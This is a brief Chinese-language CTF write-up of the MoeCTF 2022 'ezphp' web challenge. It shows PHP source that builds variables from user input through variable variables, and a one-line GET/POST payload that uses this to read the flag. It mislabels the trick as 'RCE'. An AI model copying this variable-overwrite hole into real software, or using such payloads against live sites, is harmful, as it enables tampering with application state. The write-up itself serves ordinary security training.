🐈
🐈

【MoeCTF 2022】ezphp

 included in Web · 2024做题
 About 200 words One minute 
Contents

[MoeCTF 2022]ezphp

思路

  • 源码

     1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

    <?php

highlight_file('source.txt');
echo "<br><br>";

$flag = 'xxxxxxxx';
$giveme = 'can can need flag!';
$getout = 'No! flag.Try again. Come on!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($giveme);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($getout);
}

foreach ($_POST as $key => $value) {
    $$key = $value;
}

foreach ($_GET as $key => $value) {
    $$key = $$value;
}

echo 'the flag is : ' . $flag;

?>

  • 如果要echo,那么不能exit。但是那么必须传flag(get或者post),并且传入flag不能等于"flag"

  • 如果要$flag的值不会被更改,那就得提前**“储存”**flag

RCE

超级二选一:GET或POST传参都可

GET

1

?fff=flag&flag=fff

POST

1

fff=flag&flag=fff

总结

  • 存储flag
Updated on 2024-10-31 
CC BY-NC-SA 4.0
Read Markdown
Web做题RCE
Back | Home
0%